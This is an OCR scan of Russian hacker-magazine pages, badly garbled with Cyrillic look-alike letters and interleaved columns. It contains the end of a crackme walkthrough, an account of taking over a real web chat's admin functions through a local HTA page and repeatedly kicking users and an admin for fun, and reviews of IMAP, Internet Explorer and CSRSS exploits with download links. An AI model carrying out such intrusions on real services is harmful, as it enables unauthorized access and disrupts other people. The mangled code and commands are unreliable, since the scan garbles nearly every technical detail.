сжатие. Ну что, приступаем к нашим опытам. 

[ломаем] Для начала не лишним будет опреде- 
лить нашу цель. Многие почему-то решили, что 
достаточно распаковать крэкми и защита снята. 
Это неправильный подход. Упаковщик служит 
лишь для уменьшения размера крэкми, но не для 
защиты. А цель наша — получить пароль на свой 
ник и узнать специальный пароль, общий для всех 
ников. Для этого не нужно распаковывать крэкми. 
После запуска его под Олькой упаковщик в памя- 
ти сам распакует крэкмис. Нам остается лишь 
посмотреть на те уязвимости, за которые можно 
зацепиться, чтобы осуществить взлом. 

Надеюсь, ты уже открыл Олей крэкмис и нажал 
Р9, запустив тем самым программу под отладчи- 
ком. Теперь в загруженной программе введи 
свой ник и любой пароль. Я ввел «ОРсН» и па- 
роль «1234567890». Нажимаем на кнопку «Заре- 
гистрировать программу» и получаем, естествен- 
но, сообщение «Вы ввели неверное имя пользо- 
вателя или пароль. Повторите попытку :)». 
Теперь мы знаем, с чего нам начать исследовать 
программу. Ставим точку останова на функцию 
ГІсМздВох (данную функцию ѴізиаІ Вазіс — 
а именно на нем и написана программа — 
использует для вывода сообщений) или на ее ор- 
динал 595. Надеюсь, у тебя установлен плагин 
Соттапсіипе для Ольки. Если нет — ищи его на 
сайте ѵѵтѵ.оІІусІЬд.сІе. В консоли этого плагина 
вводи Ьр гІсМздВох, жми Епіег и снова дави на 
кнопку «Зарегистрировать программу». Выпол- 
нение кода прервется на функции ГІсМздВох. 

66(ЮС5РЗ > 55 РІІЗН ЕВР 

Теперь проходим до конца этой функции в ре- 
жиме трассировки (нажимай Р8). Эта функция, 
как и любая другая, оканчивается операндом 
геі. После этого (предварительно увидев сооб- 
щение о неверности пароля) мы попадем обрат- 
но в код крэкмиса. Тут ты увидишь следующее: 
код, на который мы попадаем после получе- 
ния сообщения о неверном пароле 



004061 0Е 


8й 


0В 80 


лов он также не может быть. Потому условим- 


004061 0Р 


85 


0В 85 


ся: имя — более трех символов, пароль — ров- 


00406110 


58 


0В 58 


но 10 символов. 


;СНАВ 'X' 
00406111 


Ей 


0В Р0 


После проверок идет процедура преобразова- 
ния имени пользователя и пароля. Этот код на 


00406112 


РР 


0В РР 


РНР выглядел бы так: 


00406113 


РР 


0В РР 




00406114 


50 


0В 50 


[так выглядит преобразование 


;СНАВ 'Р' 
00406115 


80 


0В 80 


имени и пароля на рбр] 


00406116 


85 


0В 85 


//преобразуем имя пользователя $зІгІ\Іате 


00406117 


68 


0В 68 


Тог ($і=0;$і<5ІгІеп($зІгІ\Іате);$і++) { 


;СНАВ Ъ' 
00406118 


Р0 


0В Р0 


Тог ($]=з1г1еп($з1гНате)-1;$]>-1 ;$]--) { 
$зТ ехТ .= (огб(зиЬ5Іг($5ІгІ\Іате, $і, 1)) Л 


00406119 


РР 


0В РР 


огфиЬзІг($зІгІ\Іате, $], 1))); 


004061 ІА 


РР 


0В РР 


} 



Олька после распаковки программы не смогла 
автоматически опознать код, поэтому нажми 
СігІ+А. Начало кода теперь примет вид: 

004061 0Е . 8Э85 58РЭРРРР І_ЕА 
ЕАХЮѴѴОРЮ РТРІ 55:[ЕВР-2А8] 
пролистни код чуток вверх и ты увидишь: 

004060ЕВ . 8Э85 А8Р6РРРР І_ЕА 
ЕАХ.ЭѴѴОРЮ РТР 53:[ЕВР-958] 

004060Р1 . 50 РІІЗН ЕАХ 

004060Р2 . 8Э85 В8Р6РРРР І_ЕА 

ЕАХ.ЭѴѴОРЮ РТРІ 33:[ЕВР-948] 

004060Р8 . 50 РІІЗН ЕАХ 

004060Р9 . 8Э85 С8Р6РРРР І_ЕА 

ЕАХ.ЭѴѴОРЮ РТРІ 33:[ЕВР-938] 

004060РР . 50 РІІЗН ЕАХ 

00406100 . 6А 40 РІІЗН 40 

00406102 . 8Э85 Э8Р6РРРР І_ЕА 

ЕАХ,ЭѴѴОРЮ РТВ 33:[ЕВР-928] 

00406108 .50 РІІЗН ЕАХ 

00406109 . Е8 2ЕВ2РРРР САН 

СгаскМе. 00401 ЗЗС 



Выше расположена процедура проверки се- 
рийника. Она большая из-за того, что я специ- 
ально замусорил код при написании СгаскМе 
для усложнения его анализа. Пройдя несколь- 
ко экранов вверх, мы найдем проверку длины 
имени пользователя: 

00404286 . Е8 СРООРРРР САН 
СгаскМе. 00401 35А 

0040428В . ЗЗС9 Х0В ЕСХ.ЕСХ 
00404280 . 83Р8 04 СМР ЕАХ, 4 
РІиже расположена процедура 
проверки длины пароля: 

00404А7Е . Е8 07С8РРРР САН 
СгаскМе. 00401 35А 

00404А83 . ЗЗС9 ХОР» ЕСХ,ЕСХ 

00404А85 . 83Р8 ОА СМР ЕАХ,0А 

Несмотря на то, что пароль должен быть не ме- 
нее 10 символов, немного проанализировав 
программу, мы поймем, что больше 10 симво- 



//делаем полученный хэш от имени кратным 10 
$$ТХТ = $5ТехТзиЬзІг("0000000000", 1, 
(({Іоог(зІгІеп($зТехІ) / 10) * 10) + 10) — 
5ІгІеп($зТехІ)); 

$зРаз5 = зиЬ5Іг($зТХТ, 0, 10); 

$зТехІ = 

//криптуем хэш имени первыми 10 символами 
хэша имени 

Тог ($і=9;$і<(зІгІеп($зТХТ) — 1 0);$і=$і+1 0) { 
1ог($]=0;$]<10;$]++) { 

$зХ0Р = (зиЬзІгфзРазз, $], 1) л 
зиЬзІг($зТХТ, $і + $] + 1, 1)); 

і! (5ІгІеп($зХ0В) > 1) $зХ0В = 
зиЬзІг($зХОВ,0,1); 

$зТех! .= $зХ0В; 

} 

$5Разз = $зТехІ; 
зТехІ = 

} 

//получаем имя функции регистрации из 
пароля $5ІгРаз5 
Іог($і=0;$і<10;$і++) { 

$сосІе = $собе.сИ(5иЬ51г($5Раз5, $і, 1) Л 
огб(5иЬ5Іг($5ІгРа55, $і, 1))); 

} 



После этого $собе вызывается как функция. 
Для этого в ѴВ есть функция СаІІВуЫате. В на- 
шем крэкми ее вызов мы найдем тут: 



0040568А . Е8 65ВСРРРР САП 

СгаскМе. 00401 2Р4 
0040568Р .50 РИЗН 

00405690 . РР35 10304100 РЦЗН 

РТВ 03:[41 301 0] 

00405696 . 8085 38РРРРРР ПА 
ЕАХ,0ѴѴ0В0 РТВ 33: [ЕВР-С8] 
0040569С . 50 РЦЗН 

00405690 . Е8 ЕСВВРРРР САП 

СгаскМе. 00401 28Е 
004056А2 . 50 РІІЗН 

004056АЗ . 8085 28РРРРРР ПА 

ЕАХ,0ѴѴ0В0 РТВ 33: [ЕВР-08] 
004056А9 . 50 РУЗН 



ЕАХ 

0ѴѴ0В0 

ЕАХ 

ЕАХ 

ЕАХ 






004056АА . Е8 ЕВВВРРРР САН 
СгаскМе. 00401 29А 
004056АР . 8085 А4Р6РРРР І_ЕА 
ЕАХ^ѴѴОРЮ РТВ 33: [ЕВР-95С] 

После вызова функции по адресу 0040568А в 
регистре еах мы получаем адрес на $сосІе, то 
есть на функцию, которую нужно вызывать. 
Еще одна уязвимость данного крэкми состоит 
в обратимом алгоритме шифровки. Если в ка- 
честве пароля ввести имя функции, то в еах 
уже будет адрес на пароль. То есть наша зада- 
ча определить имя функции длиной 10 симво- 
лов, которую нужно вызывать, затем ввести ее 
вместо пароля, и по адресу 0040568Р получить 
пароль на наше имя. Так как программа запа- 
кована, то чтобы в ней рыться, нам нужно сде- 
лать ее дамп. Для этого в ОІІу жмем правой 



кнопкой по листингу и выбираем в появившем- 
ся меню Оіітр беЬиддесІ ргосезз. Нам не нужен 
рабочий дамп, поэтому просто жмем в появив- 
шемся диалоге Оитр и вводим имя файла. Те- 
перь открываем файл в фаре по РЗ или в 
Иіеѵѵ'е и начинаем искать в нем 10-символьные 
строки среди функций. Листать долго не при- 
дется: Рісіигеі ІЫРазз ІЫТехІ тЫнЗЩІ?<-і+ 
к 'І_УМІ\Іате МРазз РогтІІпІоасІ Оесосіе + V 
Среди всего этого мусора мне приглянулась 
функция РогтІІпІоасІ. 

Попробуем ее ввести в качестве пароля. 
Теперь после вызова кода 



0040568А . Е8 65ВСРРРР 
СгаскМе. 00401 2Р4 



САН 



в регистре еах будет адрес на строку «@і\д/кОіттсІЬ». 



Попробуем ввести ее в качестве пароля, 
и мгновенно на фоне логотипа журнала мы 
увидим поздравления и пароль, общий для 
всех ников. Поздравляю, мы полностью 
исследовали крэкмис. 

[итоги] Все вычисленные данные нужно 
было ввести на сайте ѵѵѵѵѵѵ.расіопак.ги, чтобы 
зарегистрировать прохождение конкурса. 
Первым задание выполнил сІМІЧІ, вто- 
рымстал чувак с забавным ником «ааа ЬЫэ», 
замыкает тройку ЗИіпег. 

В этом месяце тебя опять ожидает кое-что 
новенькое и очень интересное. Тебе предстоит 
поломать полноценный юниксовый сервер. 
Как ты это сделаешь — мне лично все равно, 
полное описание задания и цель атаки ищи 
на ѵѵѵѵѵѵ.расіопак.ги. Удачи © 







ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 
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Сверлим чат МТѴ 



ИЗ НАШИХ СТАТЕЙ НЕСЛОЖНО УЯСНИТЬ: ИСПОЛЬЗОВА- 
НИЕ БЕСПЛАТНЫХ ѴѴЕВ-СКРИПТОВ ЧРЕВАТО ПРОБЛЕМА- 
МИ С БЕЗОПАСНОСТЬЮ САЙТА. МОЖЕТ БЫТЬ, ПОЭТОМУ 
СЕРЬЕЗНЫЕ ОРГАНИЗАЦИИ ПРЕДПОЧИТАЮТ ПОЙТИ К 
НАСТОЯЩИМ ПРОФЕССИОНАЛАМ И ЗАКАЗАТЬ КАЧЕСТ- 
ВЕННЫЙ, А ГЛАВНОЕ, УНИКАЛЬНЫЙ ДВИЖОК ДЛЯ СВОЕ- 



ГО ПРОЕКТА. ОДНАКО И ЭТО ЕЩЕ НЕ ГАРАНТИРУЕТ ОТ- 
СУТСТВИЕ СЕТЕВЫХ ПРОБЛЕМ. НЕДАВНО ВОТ МЫ НАШ- 
ЛИ ЧЕЛОВЕКА, КОТОРЫЙ СОГЛАСИЛСЯ РАССКАЗАТЬ 
О ТОМ, КАК ОН ПОЛОМАЛ ПОПУЛЯРНЫЙ ЧАТ МТѴ, СДЕ- 
ЛАННЫЙ, К СЛОВУ, ПЕРЦАМИ ИЗ АСТІ5.ВІІ. КАК ВИДИШЬ, 
БАГИ ЕСТЬ НЕ ТОЛЬКО В РНРВВ I Р-22 (МПр://гипІіте-5Іис1іо.ппп.ги) 




шшш.тІѵ.ги/пешсШсШ.із — 

адрес сценария с описанием всех клиентских функций чата МТѴ. 
Шр://гипІіше-5ІисІіо.пт.ги/сШ.тІѵ.ас1тіп.Ш — 
адрес Ш-приложения для администрирования чата. 



Получение административных 
привилегий в чате МТѴ 



[о чатах] Вообще-то я терпеть не могу эти ѵѵеЬ-чаты — настоящий отстой. 
Но однажды так случилось, что мне пришлось зайти на чат МТѴ и он ока- 
зался наименее отвратительным из всех, что я видел. Во всяком случае, 
с технической стороны. Во многих аналогичных системах список ников, 
страница с сообщениями и все остальные динамические части просто 
тупо перегружаются каждые п секунд. Это все приводит к большому рас- 
ходу трафика и, вообще, крайне нерационально. Интересно, так ли рабо- 
тает чат МТѴ? Сейчас узнаем. Открыв НІтІ-код страницы с чатом, я при- 
нялся изучать его, а также все документы, на которые он ссылался. 
Первым делом в глаза бросился блок ]аѵазсгірІ, состоящий из несколь- 
ких вызовов функции асісііізег, каждая, как легко понять из названия, 
дописывала ник пользователя в общий список. Таким образом, для до- 
бавления нового пользователя нужно было всего лишь один раз вызвать 
эту функцию и передать ей соответствующие параметры, а не перегру- 
жать всю страницу целиком. Вызов функции осуществлялся из невиди- 
мого фрейма (у которого НеідІіІ="0") и выглядел следующим образом: 

[так формируется список активных ников] 

<ЗСВІРТ ЬАЫСіІІАС1Е="іаѵа5СГІр1:"> 

1:ор.асІсІІІ5ег('6е6а4778-Ь51 3-4ЬЬ2-98Т8-781 Т7Т4аеТ07', 'Э'АѵоГ, Іаізе); 
Іор.асісШ5ег('Ы577с30-38ІМ5е8-Ы9сі-07сІ35Іеса6сі4', 'Іпіегпо.777 1 , Іаізе); 
1:ор.асІсШ5ег('Т66ас96Т-1 ТСІ7-4681 -94Те-8сІТ42921 ОсТЬ', 'фдигиР', Іаізе); 



Как можно заметить, функция асісііізег принимала сразу три параметра: 
какой-то длинный идентификатор, ник и логическую переменную, которая 
могла принимать два значения: ігие или Іаізе. Так сходу разобраться, что и 
к чему в этом чате, не представлялось возможным, поэтому я общеизвест- 
ным способом сохранил себе на жесткий диск страницу с чатом и все кли- 
ентские скрипты, после чего принялся изучать структуру и работу чата. 

[о чате в целом] Чат МІѵ состоит из четырех основных серверных 
азрх-приложений и трех ]з-файлов со скриптами. Что касается клиен- 
тских сценариев, нас будет интересовать только файл сПаЦз, где собра- 
ны все ключевые функции системы. В остальных сценариях производит- 
ся проверка установленных на компьютере плагинов и возможностей 
браузера, нам это совершенно не интересно. 

Что же касается серверных приложений, то здесь структура следующая: 
ГГ Сценарий зреесИ.азрх отвечает за отображение сообщений в чате 
\2\ Іізіазрх отображает актуальный список ников 

[з] іприіазрх отвечает за вход/выход пользователей, показывает форму 
аутентификации и осуществляет отправку сообщений 
Щ ѵѵогк.азрх — основной сценарий, который осуществляет управление чатом. 

Общая схема их совместного функционирования приведена на рис. 2. 
Когда клиент подключается к системе, серверные сценарии зреесИ.азрх 
и Іізіазрх выбирают из своих баз данных последние сообщения и акту- 
альный список ников, после чего формируют соответствующие ИІтІ- 






страницы и отсылают их пользователю. После этого все функциониро- 
вание чата уже происходит благодаря сценарию ѵѵогк.азрх, вывод кото- 
рого обновляется каждые 15 секунд и содержит в себе динамически 
формируемый список ]аѵазсгірІ-команд, которые влияют на содержи- 
мое остальных страниц. Страница іприі.азрх содержит формы для вхо- 
да, выхода и отсылки сообщения в чат. Все это безобразие разброса- 
но по четырем фреймам. Формы из іприі.азрх отсылаются во фрейм 
с ѵѵогк.азрх, передавая ему методом РОЗТ соответствующие парамет- 
ры. В свою очередь, ѵѵогк.азрх возвращает страницу с набором 
]аѵазсгірІ-команд, которые приписывают пользователю соокіе с его 
зеззіоп_ісІ для последующей идентификации, и обновляют форму 



іпріЛ.азрх. Далее ѵѵогк.азрх периодически, или принудительно после " 

отправки сообщения, дописывает новые данные во фреймы со стра- ^ 
ницами Іізі.азрх и зреесП.азрх. Содержимое его команд выглядит при- О 
мерно следующим образом: ^ 

\ і / I 

Действия, описанные в этой статье, хоть и не несут, по большому 00 

счету, ничего плохого, но все же попадают по УК РФ. Так что не стоит 
повторять моих опытов. 

/ I \ 

На нашем диске ты найдешь программу ІпеіСгаск, которая позволит 
тебе «на лету» менять отправляемые ѵѵеЬ-серверу заголовки. 
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рис. 2: общая 
схема работы 
чата тіѵ 
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[макет того, что подгружается в ѵѵогк.азрх] 



[скрываем ГіІтІ-элемент из іаѵазсгірі] 



<5СГІрЬ 

Іор.аббМеззадеСсо', '<0ІѴхТВхТ0 
СІАЗЗ=\''и5егпате\''>ІМТЕІ_<Я0хТ0>Анастасия БЕННИНГТОН, 
хай<Я0х/ТВх/0ІѴ>'); 

Іор.аббМеззадеСсо', '<0ІѴхТВхТ0 

СЕАЗЗ=\"изегпате\">С1озИа89<ЯО><ТО>Привет ЕСТЬ тут девчонки из 
Питера?<ЯОхЯВх/ОІѴ>'); 

1:ор.асІсШзег('6е6а4778-Ь51 3-4ЬЬ2-98Т8-781 17Т4аеТ07', 'Э'АѵоГ, Іаізе); 
Іор.гетоѵеОІбМеззаде5(250); 

//и Т.Д. 

</зсгірІ> 

Описание вызываемых из ѵѵогк.азрх функций содержится в файле сГіаІ.із. 

[о скрытых полях] В стандарте НТМІ_ 4 есть такая интересная фишка, 
как таблицы стилей (СЗЗ). Наверняка любой, кто сидел в Интернете и пы- 
тался сам создавать ѵѵеЬ-странички, слышал о такой штуке. СЗЗ имеет три 
версии, которые называются «уровнями» (Іеѵеіз), причем каждая, более 
старшая версия, является надмножеством предыдущих. С момента вступ- 
ления в действие стандарта СЗЗ І_еѵеІ 2 уже прошло достаточно много 
времени, поэтому на сегодняшний день именно он считается основным и 
поддерживается всеми современными браузерами. Среди огромного чис- 
ла предоставляемых возможностей нас сегодня будет интересовать толь- 
ко одна — поддержка «скрытых» полей. Это блоки ЫтІ-кода или сплошно- 
го текста, которые загружаются в браузер вместе с основной ГіІтІ-страни- 
цей, однако в браузере они не отображаются, как будто их нет. Содержание 
«скрытых» полей можно увидеть, если просмотреть НТМЬкод страницы. 

К примеру, чтобы сделать содержание какого-либо тэга скрытым, ему в па- 
раметр зіуіе надо добавить строчку сіізріау: попе, то есть если у нас есть 
фрагмент <Гі1 >бла бла бла</М >, то, чтобы сделать его 
скрытым, надо написать <Гі1 5ІуІе="сІІ5рІау:попе">бла 
бла бла</И1>. Помимо того, что скрывать поле можно 
присвоением соответствующего значения параметру 
зіуіе, на видимость элемента можно влиять и динами- 
чески из іаѵазсгірі. Обращаясь к какому-либо иденти- 
фицированному элементу ѵѵеЬ-страницы (у которого 
есть параметр іб), в ІпІегпеІ Ехріогег можно использо- 
вать свойство сіізріау объекта зіуіе. Чтобы было проще 
разобраться, приведу простой пример: 



<И1 іб=Ыа>бла бла бла</И1> 

<зсгірІ Іапдиаде=іаѵазсгірІ> 

боситепІ-деІЕІетепІВуІфЪІа"). зіуіе. сіізріау = 'попе'; 

// скрыли 

сІоситет.деІЕІететВуІсІС'Ыа^.зІуІе.сІізрІау = 'Ыоск'; 

// показали 

</зсгірІ> 

Значение Ыоск работает не во всех браузерах, поэтому иногда вместо 
него пишут іпііпе. Возможность иметь на странице скрытые поля появи- 
лась относительно давно, и все современные браузеры поддерживают 
эту спецификацию (имеется ввиду ІЕ > 5.0, Орега > 5.0, Рігеіох 1.x и так 
далее). Используются они, в основном, для сокрытия от глаз пользова- 
теля ненужной информации, той, которая, например, предназначена для 
поисковых систем. Однако разработчики чата МІѵ решили использовать 
«скрытые» поля совсем для других целей... 

[интересное в сііаі.із] Как я уже отмечал выше, файл сНаІ.із содер- 
жит в себе набор функций, которые реализуют все управление клиен- 
тской частью чата: например, добавляют сообщения в основной фрейм, и 
дописывают ники новых пользователей в общий список. Меня особенно 
интересовала именно эта функция. Выглядит она следующим образом: 

[функция добавления нового пользователя чата] 

Іипсііоп аббІІзег(іб, пате, ізАбтіп) 

{ 

гетоѵеіізег(ісі); 

ѵаг сиггРгате = Іор.Ігатез['со_ІізІ']; 
ѵаг ІізЮіѵ = сиггРгате.боситепІ.деІЕІетепІВуІб('и5егІ_і5І'); 
...//зкірресі 
ѵаг ітд = 

іпІоАгеа.аррепбСЫІб(сиггРгате.боситепІ.сгеаІеЕІетепІ('ІМС')); 
ітд. зге = 'і/' + (ізАбтіп ? 'іпіо-абтіп.діі' : ’іпТо-изег.діТ'); 
ітд.ѵѵібііі = 13; 
ітд.ііеідМ = 9; 
ітд.Ьогбег = 0; 
ітд.аіідп = 'аЬзтіббІе'; 
ітд.аІІ = 'Іпіо'; 



рис. 3: 
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Просматривая код функции дальше, я натолкнулся на еще более инте- 
ресный участок кода: 

[интересный участок кода] 

ѵаг абтіпАгеа = 

пеѵѵизегОіѵ.аррепбСЫІб(сиггРгате.боситепІ.сгеаІеЕІетепІ('ЗРАІ\Г)); 
абтіпАгеа.сІаззІМате = 'Ыоск'; 

абтіпАгеа.зІуІе.бізрІау = ЫзАбтіп ? 'іпііпе' : 'попе'; //эта строка 
интереснее всего 

еѵаІ('абтіпАгеа.опсІіск = ІипсІіоп() { орепАбтіпІпІе!асе(\" + іб + 'V); 
геіигп Іаізе; }'); 

На самом деле, не нужно глубоко вникать в объектную модель системы, что- 
бы понять: в зависимости от переменной ЫзАбтіп (Ігие или Іаізе) 
у объекта абтіпАгеа меняется свойство сіізріау (іпііпе или попе, то есть пока- 
зать или скрыть). Совершенно понятно, что изучаемый сценарий также управ- 
лялся снаружи серверным приложением, которое передавало переменную 
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рис. 4: 
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того, что, по стандарту безопасности, ко- 
торый поддерживают все браузеры по 
умолчанию, страницы с разными домена- 
ми не могут никак влиять на содержимое 
друг друга. Конечно, в какой-нибудь опере 
нашлись бы нужные настройки, но вот 
только искать их у меня не было никакого 
желания. 



ЫзАбтіп, в зависимости от значения которой и принимается решение: показы- 
вать ли пользователю ссылку на административный интерфейс. 

Просмотрев код сііакіз дальше, я наткнулся на еще более удивитель- 
ную вещь: адреса страниц для администрирования чата и для получе- 
ния информации о пользователе были прописаны в скрипте явно, это 
были азрх-скрипты, которые принимали своим параметром ісі пользо- 
вателя и назывались изегЫоск.азрх и изегіпіо.азрх. Вот это супер! 
Получается, если обратиться к изегЫоск.азрх?ісІ=[некий ісі юзера, который 
был в чате], этот пользователь окажется заблокированным? Сейчас попро- 
буем. Загрузив в браузере страницу, я не увидел ничего обнадеживающе- 
го. На странице был синий фон без всего, что должно было присутствовать, 
по моему мнению, на странице администраторского интерфейса чата. 
Да и подопытный пользователь так и остался сидеть в чате. 

Ко мне в голову пришла резонная мысль: не могли создатели системы 
открыть эти скрипты всему Интернету. Это было бы странно, какая-то 
защита тут должна была быть. Ну, скажем, сценарий вполне мог смот- 
реть на заголовок запроса в поле Веіегег, ожидая видеть там домен 
уѵт /ѵ.тіѵ.ги и не пуская, таким образом, никого со стороны. Однако тебе 
ли не знать, как легко обходится такая «защита». 

К сожалению, о существовании программы ІпеЮгаск на тот момент я 
не подозревал и, соответственно, поменять заголовки и отправлять их 
на сервер с ходу не мог, писать же самому какого-то левого клиента 
очень не хотелось. Поэтому надо было придумать что-то такое, чего 
еще не было сделано никем и нигде: вызвать административное окно 
из фрейма со списком ников и именно с сайта тіѵ (то есть нужно бы- 
ло, чтобы страница вызвалась не откуда-то с моего локального компь- 
ютера, а непосредственно с сервера тіѵ). Единственное, что пришло 
мне в голову, — вызвать страницу Іізі.азрх (страницу со списком ни- 
ков) из своего локального фрэйма и специальным іаѵазсгірі-ом «засве- 
тить» скрытые поля и ссылки. Однако это было невозможным ввиду 



[об Иіа и фреймах] Еще где-то года 2 назад я залез в доки по 
виндам и прочитал про такую удивительную вещь, как Ыа. Дос- 
ловно это расшифровывается, как Нурег Тех! Арріісаііоп — гипер- 
текстовое приложение, то есть обычная ПІтІ-страница, оформ- 
ленная в виндовском окне и имеющая точно такие же права дос- 
тупа к функциям системы, как и обычные приложения. Это мне 
и нужно было. В Ыа у тэга іігате есть параметр арріісайоп, и если 
присвоить ему значение уез (сіігате аррІісайоп=уез>), то на со- 
держимое страницы внутри него можно будет влиять извне неза- 
висимо от того, локальная она, или загружена с какого-то интер- 
нетовского адреса. Дальше все было просто. Я даже не засвечи- 
вал никаких полей, а просто переписал основную страницу чата в 
Ыа, убрал все лишние фреймы, кроме того, в котором был список 
ников, и поставил ему параметр аррІісайоп="уе5" таким образом, 
что теперь на его содержимое можно было влиять локально, пос- 
ле чего, просто переписал в сііаі.із одну строчку вместо 
ізАсІтіп=ІаІ5е, поставил ізАсІтіпЩгие и подключил его к созданно- 
му Ыа (<зсгір{ згс=сІіаІІ5>). Таким образом, я получил локальную 
версию работающего списка ников чата тіѵ со всеми возможнос- 
тями администратора (см. рис 3). 

Как видно из рисунка, отличался этот список от обычного тем, 
что рядом с каждым ником стояли оранжевый крестик и икон- 
ка, похожая на визитную карточку. Также непосредственно 
над списком были две загадочные ссылки: «включить 
фильтр» и «перегрузить фильтр». Судя по всему, они включа- 
ют и отключают блокировку нецензурной брани, только про- 
верить их мне так и не удалось, потому что посетители чата 

тіѵ пишут матом в_о_т т_а_к, обходя все эти фильтры. 

Самая главная фишка админского интерфейса — оранжевый 
крестик! Он работает великолепно. Если нажать на него, отк- 
роется окошечко, показанное на рис. 5. 

В нем светится ір выбранного пользователя (вот тебе и ответ 
на вопрос «как узнать ір в чате» :)) и предлагаются некоторые 
варианты его блокировки: по нику, по ір, навсегда или на вре- 
мя. Кстати говоря, слово «навсегда», по понятиям тіѵ'шных 
админов, означает всего лишь «до конца суток». В самом де- 
ле, странно, если бы было по-другому: на одном ір может си- 
деть и тысяча человек. 

Кстати, забавная штука. Днем в этом чате всегда сидит админ с ником 
рипізііег. Так вот, его тоже можно выкинуть, а я это постоянно делал ра- 
ди веселья. Однако он возвращался уже через несколько минут, пос- 
кольку, видимо, имел доступ к базам данных с никами и блоками. Да и ір 
у него был из ІШѵ'шной сети 
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ІѴЮАЕМОІЧ ІМАР ВЕМОТЕ ВОР ЕХРЮІТ 
[описание] Занятная история с софтинкой 
ІѴЮаетоп, которая представляет из себя поч- 
товую службу от производителя АІ_Т-Г\І, нача- 
лась еще с 20 июля. Некий ксоре объявил о 
двух уязвимостях в сервисе. Первая представ- 
ляла собой банальное переполнение буфера 
при создании новой папки. Злоумышленнику 
достаточно было залогиниться и выполнить ко- 
манду А001 СРЕАТЕ А, где А — более тысячи 
символов подряд. В итоге, служба прекращает 
свою дальнейшую жизнедеятельность. Узнав 
про это, производители ІѴЮаетоп тут же зала- 
тали баг, но забыли, что багоискатель упомя- 
нул также про вторую уязвимость. Она была 
куда более ценной, чем СВЕАТЕ-Ьид, ведь пе- 
реполнение буфера можно осуществить даже 
не имея доступа к почтовику. Достаточно лишь 
отправить заветную последовательность байт, 
и сервис тут же упадет. 

Эксплойт представляет собой перловый мо- 
дуль, который всего-навсего следует чуть-чуть 
подправить и активировать из скрипта мето- 
дом пеѵѵ(). 

[защита] На момент выхода обзора послед- 
няя версия ІѴЮаетоп была уязвима. Проверка 
производилась на моем ноутбуке с ѴѴіпХР+ЗР2 
на борту. 

[ссылки] Забирай эксплойт отсюда: шш.зеси- 
гПуІаЬ.ги/рос/ех1га/239653.рІір. Также публикую 
ссылку на первоисточник — на странице 
ѵѵѵѵѵѵ.зесигіІуІаЬ.ги/ѵиІпегаЫІіІу/зоигсе/2 1191 Э.ріір 
ты можешь ознакомиться с деталями СВЕАТЕ- 
бага и заценить эксплойт к нему. 

[злоключение] Путь ІѴЮаетоп и не самый 
распространенный почтовый сервис, но доста- 
точное количество пользователей и админов 
любят демон за его простоту и удобство в наст- 
ройке. Для хакера открывается большая интер- 
нет-поляна для деструктивных действий :). 

[дгееіз] Идея и реализация эксплойта принад- 
лежит ксоре. Затрудняюсь сказать к какой хак- 
команде он принадлежит, скорее всего, — прос- 
то девелопер-одиночка, не ищущий славы :). 



ІЕ «МЗООЗЮЦ.» ВЕМОТЕ ЕХРЮІТ 
[описание] В прошлом обзоре я писал про 
МісгозоК Іпіегпеі Ехріогег Мзсісіз.сііі СОМ ОЬіесІ 
Ветоіе Ехріоіі, однако сплоит работал не на 
всех версиях браузера. Недавно в паблик про- 
сочился код этого же сплоита, только функци- 
онирующего на ѴѴіпХР+ЗР2 ІЕ 6.0. Сам 
эксплойт написан на Перле и его задача — 
создать бажную НТМЬстраницу. В этой паге 
посредством оЬіесІ-тэга вызывается шелл-код, 
переполняющий буфер осла и оставляющий на 
память шелл на порту 28876. 

Правда, как это обычно бывает, в эксплойте 
есть маленькая недоделка. Знающий человек 
сразу догадается и исправит ошибку после 
первого неудачного запуска. А незнающий — 
пойдет лесом :). После исправления недочета, 
достаточно запустить сплоит с редиректом в 
страницу ЫаИ.НІтІ, а затем попытаться открыть 
загадочную НТМЬстраницу. Что будет даль- 
ше, ты, наверное, уже догадался :). 

[защита] Список патчей для различных сис- 
тем ты найдешь на странице МІрУ/зесигіІу. ппо ѵ. ги/ 
ЗсІоситепі419.ЫтІ. Советую не медлить с об- 
новлениями, а сразу скачать и поставить необ- 
ходимую заплатку. 

[ссылки] Забирай эксплойт по адресу 
шт /.зесигіІуІаЬ.ги/рос/ехІга/239648.рІір. И н- 
формацию по этой уязвимости можно найти 
здесь: МірУ/зесигііу. ппоѵ. ги/ЗсІоситепМ 32.МтІ. 

[злоключение] Нетрудно предположить, что 
долгое время этот код находился в приватных 
источниках и использовался только избранны- 
ми хакерами. Теперь каждый желающий мо- 
жет испытать это творение на себе. Если, ко- 
нечно, он найдет и исправит небольшую недо- 
делку в скрипте :). 

[дгееіз] Благодарим человека Апопутоиз, ко- 
торый додумался написать эксплойт. Сам код, 
если верить автору, был украден у хакера с 
именем Вегепб-бап ѴѴеѵег. 



СЗВЗЗ.ЕХЕ ЗТАСК ОѴЕВРЮѴѴ ЕХРЮІТ 
[описание] В огород МісгозоЙ снова кинули 
камнем. На этот раз был создан локальный 
эксплойт для ѴѴІП2000/ХР+ЗР1. Сплоит выполня- 
ет переполнение буфера в процессе СЗВЗЗ.ЕХЕ. 
Он нужен для выполнения графических команд 
ѴѴіпсІоѵѵз. 

Разберемся подробнее: с помощью АРІ-вызо- 
вов, ѴѴіпсІоѵѵз передает структуру консольного 
окна. Эта структурка имеет название СОЫ- 
ЗОІ_Е_ЗТАТЕ_ІІ\ІРО. Все бы ничего, но в ней су- 
ществует параметр РасеІМате, характеризую- 
щий название шрифта. Он, как и все остальные, 
копируется в фиксированный буфер с помощью 
функции ѵѵсзсру(), естественно, без всяких про- 
верок. Все бы ничего, но длина параметра огра- 
ничивается 32 байтами. Если тупо переполнить 
буфер, винда тут же выдаст экран смерти. А ес- 
ли подумать, как это сделали ребята из 
ЮЕРЕІМЗЕ, можно наколбасить хороший шелл- 
код и вызвать стб.ехе с правами ЗУЗТЕМ :). 

[защита] Если ты обратишься по адресу 
Иир://зесигіІу.ппоѵ.ги/ІсІоситеп1308.ІіІтІ, то най- 
дешь полный список патчей для ѴѴІП2000/ХР. 
Как альтернативное решение предлагается отк- 
лючить запуск стб.ехе на публичных термина- 
лах. Это осуществляется добавлением двоично- 
го параметра НКЕУ_СШВЕМТ_ІІЗЕВ\ЗоПѵѵаге\ 
РоІісіезХМісгозоШѴіпбоѵѵзХЗузІетЮізаЬІеСІѴЮ со 
значением 1 . 

